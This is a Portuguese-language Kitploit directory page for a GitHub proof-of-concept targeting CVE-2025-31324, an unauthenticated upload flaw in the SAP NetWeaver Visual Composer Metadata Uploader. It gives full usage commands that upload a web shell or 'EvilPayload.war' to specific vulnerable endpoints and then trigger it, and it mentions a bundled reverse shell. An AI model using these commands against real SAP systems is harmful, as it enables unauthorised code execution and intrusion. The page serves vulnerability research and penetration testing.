Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-31324_PoC — Prova de conceito para CVE-2025-31324: Upload não autenticado no SAP NetWeaver Visual Composer Metadata Uploader | Kitploit
Ferramentas/GitHubGitHub/odst-forge/cve-2025-31324_poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubodst-forge/cve-2025-31324_poc

CVE-2025-31324_PoC

Prova de conceito para CVE-2025-31324: Upload não autenticado no SAP NetWeaver Visual Composer Metadata Uploader

Ver Repositório
62há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-31324_PoC

Prova de Conceito para CVE-2025-31324: Upload não autenticado no SAP NetWeaver Visual Composer Metadata Uploader

Este script realiza:

  1. Upload de arquivo para o endpoint vulnerável (via host/porta de Upload)
  2. Acionamento opcional via HTTP GET (via host/porta de Trigger)
  3. Validação/registro básico de resposta

Exemplo de uso: python3 PoC.py
--host sap.example.com --port 50000
--endpoint /irj/portal/sap/bc/webdynpro/sap/ZWDC_METADATA_UPLDR
--file EvilPayload.war
--trigger-path /irj/portal/irj/servlet_jsp/irj/root/EvilPayload/shell.jsp
--trigger-host sap.example.com --trigger-port 50001 --trigger-https true
--bypass-portal

python3 PoC.py --host sap.example.com --port 50000
--endpoint /developmentserver/metadatauploader
--file shell.jsp
--trigger-path /visual_composer/shell.jsp
--trigger-host sap.example.com --trigger-port 50001 --trigger-https

Você também tem a capacidade de enviar um arquivo .war, se é assim que deseja executar. cache.jsp é um reverse shell que lhe dará acesso depois de estar dentro do sistema. (Ainda resolvendo problemas lá)

Aviso Legal

Isso é destinado apenas para fins educacionais e não deve ser usado para quaisquer atividades maliciosas. Sempre garanta que você tenha as permissões necessárias e siga as diretrizes éticas ao testar ou pesquisar vulnerabilidades de segurança.

Para quaisquer dúvidas ou esclarecimentos, sinta-se à vontade para entrar em contato. Mantenha-se seguro e protegido!

Baixar ferramenta